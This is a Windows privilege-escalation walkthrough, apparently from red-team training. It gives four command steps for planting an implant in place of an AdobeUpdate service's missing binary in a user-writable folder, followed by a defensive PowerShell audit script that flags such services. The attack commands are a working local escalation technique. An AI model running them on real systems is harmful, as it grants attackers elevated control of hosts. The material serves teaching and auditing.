First: Let's try to find services whose binary is missing

Autorunsc64.exe -a s | more

Second: Take a look at the service configuration

sc qc AdobeUpdate

Please notice that the service is configured to use this binary, but that binary is not there

Third: Let’s check if we have write access to that folder

icacls C:\RTO\bin

And we have Modify access

Fourth: Copy our malicious service to that path

copy C:\Users\IEUser\Desktop\LPE\implant\implantsrv.exe C:\RTO\bin\AdobeUpdate.exe

Now, on reboot, the service will start with high-integrity access
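
From the defender's side, the condition the steps above rely on (a service pointing at a binary that no longer exists, in a folder that ordinary users can write to) can be audited across a host. The script below is an added example, not part of the original walkthrough; the list of low-privileged groups and the function name Get-ServiceExePath are assumptions chosen for illustration.

```powershell
# Added audit example: report services whose configured binary is missing and
# show which low-privileged groups can create files in the binary's folder.
# Assumption: these identities are treated as "low-privileged" on this host.
$lowPriv = 'BUILTIN\Users', 'Everyone',
           'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$createFiles = 2   # FileSystemRights CreateFiles / WriteData bit
$inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

# Hypothetical helper: extract the executable from a service command line,
# handling quoted paths and unquoted paths that contain spaces.
function Get-ServiceExePath([string]$PathName) {
    if ($PathName -match '^\s*"([^"]+)"')          { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)')   { return $Matches[1] }
    return ($PathName.Trim() -split '\s+')[0]
}

Get-CimInstance Win32_Service | ForEach-Object {
    if (-not $_.PathName) { return }
    $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceExePath $_.PathName))
    # Only services whose binary does not exist are of interest here.
    if (Test-Path -LiteralPath $exe -PathType Leaf) { return }

    $dir = Split-Path -Path $exe -Parent
    $writers = @()
    if ($dir -and (Test-Path -LiteralPath $dir -PathType Container)) {
        # Allow ACEs that apply to the folder itself and permit file creation.
        $writers = @((Get-Acl -LiteralPath $dir).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            -not ($_.PropagationFlags -band $inheritOnly) -and
            $lowPriv -contains $_.IdentityReference.Value -and
            ([int]$_.FileSystemRights -band $createFiles)
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
    }

    [pscustomobject]@{
        Service        = $_.Name
        StartMode      = $_.StartMode
        RunsAs         = $_.StartName
        MissingBinary  = $exe
        FolderExists   = [bool]($dir -and (Test-Path -LiteralPath $dir))
        LowPrivWriters = $writers -join ', '
    }
}
```

Any row with a non-empty LowPrivWriters column is a candidate for cleanup: remove or disable the stale service, or tighten the folder ACL so that only administrators and SYSTEM can write there.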